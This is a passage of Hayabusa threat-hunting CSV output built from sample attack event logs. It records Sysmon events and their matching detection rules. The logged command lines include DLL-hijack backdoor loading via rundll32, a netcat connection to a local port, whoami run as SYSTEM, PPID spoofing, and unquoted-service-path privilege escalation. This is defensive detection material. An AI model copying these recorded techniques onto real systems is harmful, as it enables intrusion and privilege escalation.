AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 3536 | PGUID: 747F3D96-9F69-5E75-0000-0010729F2000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:25.569 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 3536 | PGUID: 747F3D96-9F69-5E75-0000-0010729F2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:39.226 +00:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: nc.exe 127.0.0.1 1337 | Process: C:\Users\Public\Tools\nc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2935f | PID: 3364 | PGUID: 747F3D96-9F77-5E75-0000-0010D2E62000 | Hash: SHA1=08664F5C3E07862AB9B531848AC92D08C8C6BA5A,MD5=E0DB1D3D47E312EF62E5B0C74DCEAFE5,SHA256=B3B207DFAB2F429CC352BA125BE32A0CAE69FE4BF8563AB7D0128BBA8C57A71C,IMPHASH=98CE7B6533CBD67993E36DAFB4E95946",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:39.226 +00:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:39.441 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | LID: 0x3e7 | PID: 2416 | PGUID: 747F3D96-9F77-5E75-0000-001090F32000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:40.502 +00:00,MSEDGEWIN10,3,info,,Network 
Connection,tcp | Src: 127.0.0.1:49674 (MSEDGEWIN10) | Dst: 127.0.0.1:1337 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\rundll32.exe | PID: 4848 | PGUID: 747F3D96-9F61-5E75-0000-0010686A1E00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:45.087 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x3e7 | PID: 2484 | PGUID: 747F3D96-9F7D-5E75-0000-00104E062100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:45.087 +00:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:45.087 +00:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation_sysmon/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:45.087 +00:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 05:00:54.689 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 4680 | PGUID: 
747F3D96-9F86-5E75-0000-00101A9F2100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 12:35:35.026 +00:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc stop CDPSvc | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2de43 | PID: 4876 | PGUID: 747F3D96-0A17-5E76-0000-001062373A00 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:35:35.026 +00:00,MSEDGEWIN10,1,low,Impact,Stop Windows Service,,rules/sigma/process_creation_sysmon/proc_creation_win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:35:43.104 +00:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc query CDPSvc | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2de43 | PID: 1236 | PGUID: 747F3D96-0A1F-5E76-0000-0010375C3A00 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:35:52.013 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program 
Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications | Process: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding | LID: 0x2de87 | PID: 3808 | PGUID: 747F3D96-0A28-5E76-0000-0010882B3C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:35:55.876 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: net start CDPSvc | Process: C:\Windows\System32\net.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2de43 | PID: 7072 | PGUID: 747F3D96-0A2B-5E76-0000-0010C02A3D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:35:55.876 +00:00,MSEDGEWIN10,1,low,Exec,Service Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:35:55.876 +00:00,MSEDGEWIN10,1,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:35:55.897 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\net1 start CDPSvc | Process: C:\Windows\System32\net1.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: net start CDPSvc | LID: 0x2de43 | PID: 7664 | PGUID: 747F3D96-0A2B-5E76-0000-0010A92C3D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:35:55.897 
+00:00,MSEDGEWIN10,1,low,Exec,Service Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:35:55.897 +00:00,MSEDGEWIN10,1,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:35:55.919 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 3896 | PGUID: 747F3D96-0A2B-5E76-0000-00101E2F3D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:35:56.078 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - CDPSvc | Image: C:\ProgramData\chocolatey\bin\cdpsgshims.dll | Process: C:\Windows\System32\svchost.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 3896 | PGUID: 747F3D96-0A2B-5E76-0000-00101E2F3D00 | Hash: SHA1=B3314F0EEBBB88A8AC5CF790A706B65F962A3722,MD5=3C0D53F2A6341F6D793B1EB114E6FBF6,SHA256=CCCE37A8276ACE489A237A31181DF7E2B6F58D576C2410DE0A9C21F9F9937D12,IMPHASH=FE8C6819894B9677BB9D9642B2550AC9",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:36:03.899 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\Public\Tools\nc.exe | PID: 4464 | PGUID: 747F3D96-08DA-5E76-0000-001012352E00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:36:03.901 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x3e7 | PID: 3696 | PGUID: 747F3D96-0A33-5E76-0000-0010B8813D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:36:03.901 +00:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:36:03.901 +00:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation_sysmon/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:36:03.901 +00:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 
+2020-03-21 12:36:06.990 +00:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: nc.exe 127.0.0.1 1337 | Process: C:\Users\Public\Tools\nc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2de87 | PID: 488 | PGUID: 747F3D96-0A36-5E76-0000-0010C8923D00 | Hash: SHA1=08664F5C3E07862AB9B531848AC92D08C8C6BA5A,MD5=E0DB1D3D47E312EF62E5B0C74DCEAFE5,SHA256=B3B207DFAB2F429CC352BA125BE32A0CAE69FE4BF8563AB7D0128BBA8C57A71C,IMPHASH=98CE7B6533CBD67993E36DAFB4E95946",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:36:06.990 +00:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:36:07.872 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\Public\Tools\nc.exe | PID: 488 | PGUID: 747F3D96-0A36-5E76-0000-0010C8923D00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:36:24.316 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2560 | PGUID: 747F3D96-0A48-5E76-0000-001051C83E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 12:36:38.828 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe | PID: 2744 | PGUID: 
747F3D96-0880-5E76-0000-001014202B00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:45:04.908 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\Explorer.EXE | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f3fff | Src PID: 8004 | Src PGUID: 747F3D96-26FD-5E76-0000-00100A320D01 | Tgt PID: 4668 | Tgt PGUID: 747F3D96-06AA-5E76-0000-001046E10400,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx +2020-03-21 21:45:04.908 +00:00,MSEDGEWIN10,10,high,Evas | PrivEsc,Shellcode Injection,,rules/sigma/process_access/process_access_win_shellcode_inject_msf_empire.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx +2020-03-21 21:45:04.922 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x2de87 | PID: 7708 | PGUID: 747F3D96-8AE0-5E76-0000-0010933B8003",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx +2020-03-21 21:45:04.923 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 8004 | Src PGUID: 747F3D96-26FD-5E76-0000-00100A320D01 | Tgt PID: 7708 | Tgt PGUID: 747F3D96-8AE0-5E76-0000-0010933B8003,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx +2020-03-21 21:45:16.576 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: 
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 404 | PGUID: 747F3D96-8AEC-5E76-0000-00101DDB8003,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx +2020-03-21 21:45:16.765 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 4792 | PGUID: 747F3D96-8AEC-5E76-0000-0010AAE38003,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx +2020-04-25 22:18:47.143 +00:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,PrivEsc - Potential PrivEsc via unquoted Service | Path: C:\program.exe | Process: C:\Windows\system32\cmd.exe | PID: 5712 | PGUID: 747F3D96-B521-5EA4-0000-00108C171300,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:18:47.143 +00:00,MSEDGEWIN10,11,high,Persis,Creation Exe for Service with Unquoted Path,,rules/sigma/file_event/file_event_win_creation_unquoted_service_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:18:47.143 +00:00,MSEDGEWIN10,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:00.308 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x4 /state0:0xa38bd055 /state1:0x41c64e6d | Process: C:\Windows\System32\LogonUI.exe | User: 
NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 6244 | PGUID: 747F3D96-B754-5EA4-0000-00104F0A2500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:02.057 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 4484 | PGUID: 747F3D96-B755-5EA4-0000-0010D06E2500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:02.057 +00:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_sysmon/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:02.057 +00:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:20.134 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? 
| LID: 0x3e7 | PID: 300 | PGUID: 747F3D96-B75F-5EA4-0000-0010622C0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:22.312 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: \??\C:\Windows\system32\autochk.exe * | Process: C:\Windows\System32\autochk.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 328 | PGUID: 747F3D96-B762-5EA4-0000-00108B3C0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:22.596 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 000000cc 00000084 | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 388 | PGUID: 747F3D96-B763-5EA4-0000-00106A480000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:22.630 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 000000cc 00000084 | LID: 0x3e7 | PID: 396 | PGUID: 747F3D96-B763-5EA4-0000-001034490000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:23.220 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 000000d8 00000084 | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | 
Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 460 | PGUID: 747F3D96-B764-5EA4-0000-0010794D0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:23.222 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: wininit.exe | Process: C:\Windows\System32\wininit.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 000000cc 00000084 | LID: 0x3e7 | PID: 468 | PGUID: 747F3D96-B764-5EA4-0000-0010904D0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:23.224 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 000000d8 00000084 | LID: 0x3e7 | PID: 476 | PGUID: 747F3D96-B764-5EA4-0000-0010714E0000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:23.876 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 000000d8 00000084 | LID: 0x3e7 | PID: 568 | PGUID: 747F3D96-B764-5EA4-0000-001096530000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:24.049 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\services.exe | Process: C:\Windows\System32\services.exe | User: NT 
AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 584 | PGUID: 747F3D96-B764-5EA4-0000-00106F550000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:24.054 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\lsass.exe | Process: C:\Windows\System32\lsass.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 616 | PGUID: 747F3D96-B764-5EA4-0000-001075590000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:24.188 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 732 | PGUID: 747F3D96-B764-5EA4-0000-00105B6C0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-25 22:19:24.194 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | Process: C:\Windows\System32\svchost.exe | User: NT 